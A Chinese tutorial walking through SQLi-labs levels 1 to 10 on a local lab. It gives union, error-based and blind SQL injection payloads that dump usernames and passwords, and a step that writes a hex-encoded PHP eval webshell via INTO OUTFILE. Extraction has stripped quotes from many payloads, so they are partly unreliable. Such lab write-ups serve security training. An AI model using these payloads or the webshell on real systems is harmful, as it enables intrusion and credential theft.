SQL-lab通关教程

news2026/5/20 14:52:56
Less-1单引号型完整注入流程打开靶场第一关你会看到如下图所示界面由为方便后续靶场的payload输入查看我这里了将直接利用hackbar进行sql注入测试。第1步确认闭合方式payloadhttp://127.0.0.1:8080/Less-1/?id1分析报错信息里有1→ 说明是单引号闭合你输入的1变成了1多出一个单引号导致语法错误。第2步注释掉后面代码payload:http://127.0.0.1:8080/Less-1/?id1--页面结果正常显示和?id1一样显示Your Login name:Dumb--后面全是注释实际执行的是SELECT * FROM users WHERE id1所以正常显示。第3步确定字段数order byPayloadhttp://127.0.0.1:8080/Less-1/?id1 order by 3-- - http://127.0.0.1:8080/Less-1/?id1 order by 4-- -结果正常显示 → 至少有3个字段结果,Unknown column 4 in order clause结论字段数 3原理order by N 按第N个字段排序如果SELECT只选了3个字段你写 order by 4 就会报错。第4步确定回显位Payloadhttp://127.0.0.1:8080/Less-1/?id-1 union select 1,2,3-- -分析为什么用-1让前面SELECT * FROM users WHERE id-1查不到数据这样页面就只显示union select后面的结果。页面显示了2和3→ 说明第2位和第3位是回显位可以在这里放你想查的数据。第1位不显示所以放1占位就行。第5步爆数据库名Payloadhttp://127.0.0.1:8080/Less-1/?id-1 union select 1,database(),3-- -分析database() 返回当前数据库名放在第2位回显位页面直接显示当前数据库叫 security第6步爆表名Payloadhttp://127.0.0.1:8080/Less-1/?id-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schemadatabase()-- -分析information_schema.tables 是MySQL的元数据表存了所有数据库的所有表名table_schemadatabase() 限定只查当前数据库group_concat() 把多行结果合并成一行用逗号分隔目标表是 users第7步爆字段名Payloadhttp://127.0.0.1:8080/Less-1/?id-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_nameusers-- -分析information_schema.columns 存了所有表的字段信息table_nameusers 限定查users表的字段得到字段id, username, password第8步爆数据最终目标Payloadhttp://127.0.0.1:8080/Less-1/?id-1 union select 1,2,group_concat(username,password) from users --分析group_concat(username,0x3a,password) 把用户名和密码拼在一起from users 直接查目标表的数据拿到所有账号密码总结完整payload速查-- 1. 测闭合 ?id1 -- 2. 注释 ?id1-- - -- 3. 查字段数 ?id1 order by 3-- - ?id1 order by 4-- - -- 4. 找回显位 ?id-1 union select 1,2,3-- - -- 5. 爆库名 ?id-1 union select 1,database(),3-- - -- 6. 爆表名 ?id-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schemadatabase()-- - -- 7. 爆字段 ?id-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_nameusers-- - -- 8. 爆数据 ?id-1 union select 1,group_concat(username,0x3a,password),3 from users-- -Less-2数字型第1步确认注入点不用单引号Payloadhttp://127.0.0.1:8080/Less-2/?id1 and 11 http://127.0.0.1:8080/Less-2/?id1 and 12分析and 11 为真正常查询and 12 为假查不到数据两次返回不同 → 存在数字型注入为什么不用单引号测因为 ?id1 会被当成字符串 1 处理MySQL自动类型转换不会报错测不出来。整数型要用 and 11 / and 12 测。第2步确定字段数order byhttp://127.0.0.1:8080/Less-2/?id1 order by 3 http://127.0.0.1:8080/Less-2/?id1 order by 4结果报错 Unknown column 4 in order clause结论字段数 3注意整数型不需要注释符直接 order by 3 就行后面没有引号要注释。第3步确定回显位Payloadhttp://127.0.0.1:8080/Less-2/?id-1 union select 1,2,3分析id-1 让前面查不到union select 1,2,3 直接拼在后面没有单引号没有注释符回显位还是 2 和 3第4步爆数据库名Payloadhttp://127.0.0.1:8080/Less-2/?id-1 union select 1,database(),3第6步爆字段名Payloadhttp://127.0.0.1:8080/Less-2/?id-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_nameusers第7步爆数据Payloadhttp://127.0.0.1:8080/Less-2/?id-1 union select 1,group_concat(username,0x3a,password),3 from users总结完整Payload速查-- 1. 测注入整数型不用单引号 ?id1 and 11 ?id1 and 12 -- 2. 查字段数不需要注释符 ?id1 order by 3 ?id1 order by 4 -- 3. 找回显位没有单引号没有注释 ?id-1 union select 1,2,3 -- 4. 爆库名 ?id-1 union select 1,database(),3 -- 5. 爆表名 ?id-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schemadatabase() -- 6. 爆字段 ?id-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_nameusers -- 7. 爆数据 ?id-1 union select 1,group_concat(username,0x3a,password),3 from usersLess-3单引号括号型完整注入流程7步第1步确认闭合方式http://127.0.0.1:8080/Less-3/?id1 http://127.0.0.1:8080/Less-3/?id1)-- -分析报错信息里有1)→ 说明是)闭合。你输入的1被包在括号里变成了(1)多了一个单引号但括号还在。结果正常显示Your Login name:Dumb分析)同时闭合了单引号和圆括号后面的-- -把) LIMIT 0,1全注释掉。SQL变成实际执行WHERE id(1)正常。第2步确定字段数order byhttp://127.0.0.1:8080/Less-3/?id1) order by 3-- - http://127.0.0.1:8080/Less-3/?id1) order by 4-- -结果报错Unknown column 4 in order clause结论字段数 3注意闭合方式是)所以order by前面要加)后面加-- -注释。第3步确定回显位http://127.0.0.1:8080/Less-3/?id-1) union select 1,2,3-- -分析id-1) 闭合前面的 ( 并让前面查不到union select 1,2,3 拼接在后面-- - 注释掉后面的 ) LIMIT 0,1回显位还是 2 和 3第4步爆数据库名http://127.0.0.1:8080/Less-3/?id-1) union select 1,database(),3-- -第5步爆表名http://127.0.0.1:8080/Less-3/?id-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schemadatabase()-- -第6步爆字段名http://127.0.0.1:8080/Less-3/?id-1) union select 1,group_concat(column_name),3 from information_schema.columns where table_nameusers-- -第7步爆数据http://127.0.0.1:8080/Less-3/?id-1) union select 1,group_concat(username,0x3a,password),3 from users-- -Less-4双引号括号型第1步确认闭合方式http://127.0.0.1:8080/Less-4/?id1 http://127.0.0.1:8080/Less-4/?id1)-- -分析报错信息里有1)→ 说明是)闭合。你输入的1被包在(和)里变成了(1)多了一个双引号导致语法错误。第2步确定字段数order byhttp://127.0.0.1:8080/Less-4/?id1) order by 3-- - http://127.0.0.1:8080/Less-4/?id1) order by 4-- -结果报错Unknown column 4 in order clause结论字段数 3第3步确定回显位http://127.0.0.1:8080/Less-4/?id-1) union select 1,2,3-- -分析id-1) 闭合前面的 ( 并让前面查不到union select 1,2,3 拼接在后面-- - 注释掉后面的 ) LIMIT 0,1回显位还是 2 和 3第4步爆数据库名http://127.0.0.1:8080/Less-4/?id-1) union select 1,database(),3-- -第5步爆表名http://127.0.0.1:8080/Less-4/?id-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schemadatabase()-- -第6步爆字段名http://127.0.0.1:8080/Less-4/?id-1) union select 1,group_concat(column_name),3 from information_schema.columns where table_nameusers-- -第7步爆数据http://127.0.0.1:8080/Less-4/?id-1) union select 1,group_concat(username,0x3a,password),3 from users-- -Less-5单引号报错型第1步确认闭合方式http://127.0.0.1:8080/Less-5/?id1 http://127.0.0.1:8080/Less-5/?id1-- -结果正常显示You are in...分析闭合方式是注释后面代码正常执行。第2步报数据库名http://127.0.0.1:8080/Less-5/?id1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemadatabase()),0x7e),1)-- -分析select database() 查出 securityconcat(0x7e,security,0x7e) ~security~传入updatexml第二个参数 → 不是合法XPATH → 报错 → 报错里带出 ~security~第3步爆表名http://127.0.0.1:8080/Less-5/?id1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemadatabase()),0x7e),1)-- -第4步爆字段名http://127.0.0.1:8080/Less-5/?id1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_nameusers),0x7e),1)-- -第5步爆数据第6步floor(rand()) 双查询注入Less-5经典解法、select count(*),concat((select database()),floor(rand(0)*2))x from information_schema.tables group by x第7步extractvalue 报错注入替代方案http://127.0.0.1:8080/Less-5/?id1 and extractvalue(1,concat(0x7e,(select database()),0x7e))-- -Less-6双引号报错型第1步确认闭合方式http://127.0.0.1:8080/Less-6/?id1 http://127.0.0.1:8080/Less-6/?id1-- -第2步爆数据库名http://127.0.0.1:8080/Less-6/?id1 and updatexml(1,concat(0x7e,(select database()),0x7e),1)-- -第3步爆表名http://127.0.0.1:8080/Less-6/?id1%22%20and%20updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schemadatabase()),0x7e),1)-- -第4步爆字段名http://127.0.0.1:8080/Less-6/?id1%22%20and%20updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name users ),0x7e),1)-- -第5步爆数据http://127.0.0.1:8080/Less-6/?id1%22%20and%20updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1)-- -Less-7文件写入靶场信息闭合方式id(($id))单引号 双括号注入类型布尔盲注、报错注入、文件读写注入本题核心考点页面提示Use outfile出题人直接告诉你用文件写入前置条件secure_file_priv 必须为空允许任意路径写入第1步判断闭合类型http://127.0.0.1:8080/Less-7/?id1)) http://127.0.0.1:8080/Less-7/?id1))--第2步判断字段数http://127.0.0.1:8080/Less-7/?id1)) order by 3-- http://127.0.0.1:8080/Less-7/?id1)) order by 4--结论字段数为3第3步确认注入点与回显位ess-7 没有回显位不显示查询内容只有You are in...........或报错两种状态所以是盲注环境。但题目考点是outfile文件写入直接用写入功能。第4步检查secure_file_priv配置进入 MySQL 命令行或前面关卡Less-2 等有回显的执行?id-1 union select 1,secure_file_priv,3--三种结果NULL → 禁止导入导出无法写 shell/tmp/ → 只能写到 /tmp/ 目录空字符串 → 不限制路径可以任意位置写如果显示 NULL 或固定路径修改 my.ini# 在 my.ini [mysqld] 段添加 secure_file_priv保存后重启 MySQL 服务phpstudy 里重启或systemctl restart mysql第5步获取网站绝对路径写文件必须知道绝对路径的几种写入方法# 方法1前面有回显的关卡查路径 ?id-1 union select 1,basedir,datadir-- # basedir MySQL安装路径 # datadir 数据文件路径通常也在网站目录附近 # 方法2报错泄露路径如果开启显示错误 ?id1 随便乱输 # 方法3扫目录找 phpinfo.php、.git 等泄露路径 # 用 dirsearchpython3 dirsearch.py -u http://127.0.0.1/sqli-labs/ # 方法4Linux 默认路径推测 # /var/www/html/sqli-labs/Less-7/ # /var/www/html/Less-7/第6步写入一句话木马?id-1)) union select 1,0x3c3f70687020406576616c28245f504f53545b27636d64275d293b3f3e,3 into outfile /var/www/html/Less-7/shell.php--Less-8布尔盲注第1步判断注入点?id1 and 11-- # 回显You are in........... ?id1 and 12-- # 回显无 / 空白页面结论单引号闭合布尔盲注。第2步判断字段数?id1 order by 3-- # 正常 ?id1 order by 4-- # 异常空白结论字段数为 3。第3步判断数据库名长度?id1 and length(database())1-- # 空白 ?id1 and length(database())8-- # You are in...........第4步逐字符猜解数据库名http://127.0.0.1:8080/Less-8/?id1 and substr(database(),1,1)s--这里只演示一下手动注入的原理思路接下来的爆表名字段名以及数据库内容都同上所示但在实战中通常利用脚本或者sqlmap进行工具爆破。Less-9时间盲注第1步确认时间盲注?id1 and sleep(5)-- # 页面延迟 5 秒才返回 → 注入点存在 ?id1 and sleep(5)-- # 无延迟 → 不是双引号闭合 ?id1 and sleep(5)-- # 无延迟 → 不是数字型结论单引号闭合时间盲注。第2步判断字段数用时间延迟?id1 and if((select count(*) from information_schema.tables where table_schemadatabase())0,sleep(3),1)-- # 延迟 3 秒 → 数据库存在表 ?id1 order by 3 and sleep(1)-- # 或用 union 配合 sleep 判断 ?id1 union select 1,2,3 and sleep(5)--第3步判断数据库名长度?id1 and if(length(database())8,sleep(3),1)-- # 延迟 3 秒 → 长度为 8 ?id1 and if(length(database())7,sleep(3),1)-- # 无延迟 → 不是 7第4步逐字符猜解数据库名# 第一个字符 ?id1 and if(ascii(substr(database(),1,1))115,sleep(3),1)-- # 115s延迟 3 秒 ?id1 and if(ascii(substr(database(),1,1))116,sleep(3),1)-- # 116t无延迟 # 第二个字符 ?id1 and if(ascii(substr(database(),2,1))101,sleep(3),1)-- # 101e延迟 3 秒 # 以此类推... # 最终得到security第5步猜解表名# 第一个表名第一个字符 ?id1 and if(ascii(substr((select table_name from information_schema.tables where table_schemadatabase() limit 0,1),1,1))101,sleep(3),1)-- # 101eemails 表 # users 表 ?id1 and if(ascii(substr((select table_name from information_schema.tables where table_schemadatabase() limit 3,1),1,1))117,sleep(3),1)-- # 117u第6步猜解字段名?id1 and if(ascii(substr((select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 1,1),1,1))117,sleep(3),1)-- # 117uusername ?id1 and if(ascii(substr((select column_name from information_schema.columns where table_schemadatabase() and table_nameusers limit 2,1),1,1))112,sleep(3),1)-- # 112ppassword第7步猜解数据?id1 and if(ascii(substr((select concat(username,~,password) from users limit 0,1),1,1))68,sleep(3),1)-- # 68DDumb~Dumb时间盲注与布尔盲注原理payload都有相似的地方可以放到一起进行对比记忆同样本章讲解的只是原理在真实环境碰到这种情况直接使用SQLmap工具爆破。less-10第十关参考第九关步骤与payload同样的整两关的差别只在于闭合第九关使用单引号而第十关使用双引号其余步骤相同同样是时间盲注可以自己手动注入理解原理也可以使用sqlmap直接进行爆破。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2628534.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

SpringBoot-17-MyBatis动态SQL标签之常用标签

文章目录 1 代码1.1 实体User.java1.2 接口UserMapper.java1.3 映射UserMapper.xml1.3.1 标签if1.3.2 标签if和where1.3.3 标签choose和when和otherwise1.4 UserController.java2 常用动态SQL标签2.1 标签set2.1.1 UserMapper.java2.1.2 UserMapper.xml2.1.3 UserController.ja…

wordpress后台更新后 前端没变化的解决方法

使用siteground主机的wordpress网站,会出现更新了网站内容和修改了php模板文件、js文件、css文件、图片文件后,网站没有变化的情况。 不熟悉siteground主机的新手,遇到这个问题,就很抓狂,明明是哪都没操作错误&#x…

网络编程(Modbus进阶)

思维导图 Modbus RTU(先学一点理论) 概念 Modbus RTU 是工业自动化领域 最广泛应用的串行通信协议,由 Modicon 公司(现施耐德电气)于 1979 年推出。它以 高效率、强健性、易实现的特点成为工业控制系统的通信标准。 包…

UE5 学习系列(二)用户操作界面及介绍

这篇博客是 UE5 学习系列博客的第二篇,在第一篇的基础上展开这篇内容。博客参考的 B 站视频资料和第一篇的链接如下: 【Note】:如果你已经完成安装等操作,可以只执行第一篇博客中 2. 新建一个空白游戏项目 章节操作,重…

IDEA运行Tomcat出现乱码问题解决汇总

最近正值期末周,有很多同学在写期末Java web作业时,运行tomcat出现乱码问题,经过多次解决与研究,我做了如下整理: 原因: IDEA本身编码与tomcat的编码与Windows编码不同导致,Windows 系统控制台…

利用最小二乘法找圆心和半径

#include <iostream> #include <vector> #include <cmath> #include <Eigen/Dense> // 需安装Eigen库用于矩阵运算 // 定义点结构 struct Point { double x, y; Point(double x_, double y_) : x(x_), y(y_) {} }; // 最小二乘法求圆心和半径 …

使用docker在3台服务器上搭建基于redis 6.x的一主两从三台均是哨兵模式

一、环境及版本说明 如果服务器已经安装了docker,则忽略此步骤,如果没有安装,则可以按照一下方式安装: 1. 在线安装(有互联网环境): 请看我这篇文章 传送阵>> 点我查看 2. 离线安装(内网环境):请看我这篇文章 传送阵>> 点我查看 说明&#xff1a;假设每台服务器已…

XML Group端口详解

在XML数据映射过程中&#xff0c;经常需要对数据进行分组聚合操作。例如&#xff0c;当处理包含多个物料明细的XML文件时&#xff0c;可能需要将相同物料号的明细归为一组&#xff0c;或对相同物料号的数量进行求和计算。传统实现方式通常需要编写脚本代码&#xff0c;增加了开…

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器的上位机配置操作说明

LBE-LEX系列工业语音播放器|预警播报器|喇叭蜂鸣器专为工业环境精心打造&#xff0c;完美适配AGV和无人叉车。同时&#xff0c;集成以太网与语音合成技术&#xff0c;为各类高级系统&#xff08;如MES、调度系统、库位管理、立库等&#xff09;提供高效便捷的语音交互体验。 L…

(LeetCode 每日一题) 3442. 奇偶频次间的最大差值 I (哈希、字符串)

题目&#xff1a;3442. 奇偶频次间的最大差值 I 思路 &#xff1a;哈希&#xff0c;时间复杂度0(n)。 用哈希表来记录每个字符串中字符的分布情况&#xff0c;哈希表这里用数组即可实现。 C版本&#xff1a; class Solution { public:int maxDifference(string s) {int a[26]…

【大模型RAG】拍照搜题技术架构速览:三层管道、两级检索、兜底大模型

摘要 拍照搜题系统采用“三层管道&#xff08;多模态 OCR → 语义检索 → 答案渲染&#xff09;、两级检索&#xff08;倒排 BM25 向量 HNSW&#xff09;并以大语言模型兜底”的整体框架&#xff1a; 多模态 OCR 层 将题目图片经过超分、去噪、倾斜校正后&#xff0c;分别用…

【Axure高保真原型】引导弹窗

今天和大家中分享引导弹窗的原型模板&#xff0c;载入页面后&#xff0c;会显示引导弹窗&#xff0c;适用于引导用户使用页面&#xff0c;点击完成后&#xff0c;会显示下一个引导弹窗&#xff0c;直至最后一个引导弹窗完成后进入首页。具体效果可以点击下方视频观看或打开下方…

接口测试中缓存处理策略

在接口测试中&#xff0c;缓存处理策略是一个关键环节&#xff0c;直接影响测试结果的准确性和可靠性。合理的缓存处理策略能够确保测试环境的一致性&#xff0c;避免因缓存数据导致的测试偏差。以下是接口测试中常见的缓存处理策略及其详细说明&#xff1a; 一、缓存处理的核…

龙虎榜——20250610

上证指数放量收阴线&#xff0c;个股多数下跌&#xff0c;盘中受消息影响大幅波动。 深证指数放量收阴线形成顶分型&#xff0c;指数短线有调整的需求&#xff0c;大概需要一两天。 2025年6月10日龙虎榜行业方向分析 1. 金融科技 代表标的&#xff1a;御银股份、雄帝科技 驱动…

观成科技:隐蔽隧道工具Ligolo-ng加密流量分析

1.工具介绍 Ligolo-ng是一款由go编写的高效隧道工具&#xff0c;该工具基于TUN接口实现其功能&#xff0c;利用反向TCP/TLS连接建立一条隐蔽的通信信道&#xff0c;支持使用Let’s Encrypt自动生成证书。Ligolo-ng的通信隐蔽性体现在其支持多种连接方式&#xff0c;适应复杂网…

铭豹扩展坞 USB转网口 突然无法识别解决方法

当 USB 转网口扩展坞在一台笔记本上无法识别,但在其他电脑上正常工作时,问题通常出在笔记本自身或其与扩展坞的兼容性上。以下是系统化的定位思路和排查步骤,帮助你快速找到故障原因: 背景: 一个M-pard(铭豹)扩展坞的网卡突然无法识别了,扩展出来的三个USB接口正常。…

未来机器人的大脑:如何用神经网络模拟器实现更智能的决策?

编辑&#xff1a;陈萍萍的公主一点人工一点智能 未来机器人的大脑&#xff1a;如何用神经网络模拟器实现更智能的决策&#xff1f;RWM通过双自回归机制有效解决了复合误差、部分可观测性和随机动力学等关键挑战&#xff0c;在不依赖领域特定归纳偏见的条件下实现了卓越的预测准…

Linux应用开发之网络套接字编程(实例篇)

服务端与客户端单连接 服务端代码 #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <arpa/inet.h> #include <pthread.h> …

华为云AI开发平台ModelArts

华为云ModelArts&#xff1a;重塑AI开发流程的“智能引擎”与“创新加速器”&#xff01; 在人工智能浪潮席卷全球的2025年&#xff0c;企业拥抱AI的意愿空前高涨&#xff0c;但技术门槛高、流程复杂、资源投入巨大的现实&#xff0c;却让许多创新构想止步于实验室。数据科学家…

深度学习在微纳光子学中的应用

深度学习在微纳光子学中的主要应用方向 深度学习与微纳光子学的结合主要集中在以下几个方向&#xff1a; 逆向设计 通过神经网络快速预测微纳结构的光学响应&#xff0c;替代传统耗时的数值模拟方法。例如设计超表面、光子晶体等结构。 特征提取与优化 从复杂的光学数据中自…